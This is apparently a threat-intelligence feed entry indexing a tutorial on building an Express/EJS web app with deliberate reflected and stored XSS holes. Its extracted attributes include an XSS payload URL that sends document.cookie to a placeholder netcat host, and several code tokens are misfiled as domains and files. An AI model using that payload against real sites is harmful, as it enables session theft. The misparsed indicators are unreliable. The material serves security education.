Create a Web with Reflected XSS and Stored XSS Vulnerability with Express JS EJS
Tags
| attack-pattern: | Data Model Javascript - T1059.007 |
Common Information
| Type | Value |
|---|---|
| UUID | 21fe2308-9143-4898-9d12-6d42ccbf32ce |
| Fingerprint | ea12af70a90e663c |
| Analysis status | DONE |
| Considered CTI value | 0 |
| Text language | |
| Published | Nov. 11, 2024, 4:58 a.m. |
| Added to db | Nov. 11, 2024, 6:26 a.m. |
| Last updated | Nov. 17, 2024, 9:54 a.m. |
| Headline | Create a Web with Reflected XSS and Stored XSS Vulnerability with Express JS EJS |
| Title | Create a Web with Reflected XSS and Stored XSS Vulnerability with Express JS EJS |
| Detected Hints/Tags/Attributes | 21/1/13 |
Source URLs
URL Provider
RSS Feed
| Details | Id | Enabled | Feed title | Url | Added to db |
|---|---|---|---|---|---|
| Details | 167 | ✔ | Cybersecurity on Medium | https://medium.com/feed/tag/cybersecurity | 2024-08-30 22:08 |
Attributes
| Details | Type | #Events | CTI | Value |
|---|---|---|---|---|
| Details | Domain | 40 | app.post |
|
| Details | Domain | 6 | user.save |
|
| Details | Domain | 6 | bcrypt.compare |
|
| Details | Domain | 1 | newquote.save |
|
| Details | Domain | 10 | www.base64decode.org |
|
| Details | Domain | 1 | quote.author |
|
| Details | File | 174 | index.js |
|
| Details | File | 364 | console.log |
|
| Details | File | 3 | express.url |
|
| Details | File | 10 | user.pas |
|
| Details | Url | 1 | http://ip:port_nc?cookie='+document.cookie |
|
| Details | Url | 1 | http://localhost:5000/profile?quote=<script>fetch('http://ip:nc_port?cookie='+document.cookie |
|
| Details | Url | 10 | https://www.base64decode.org |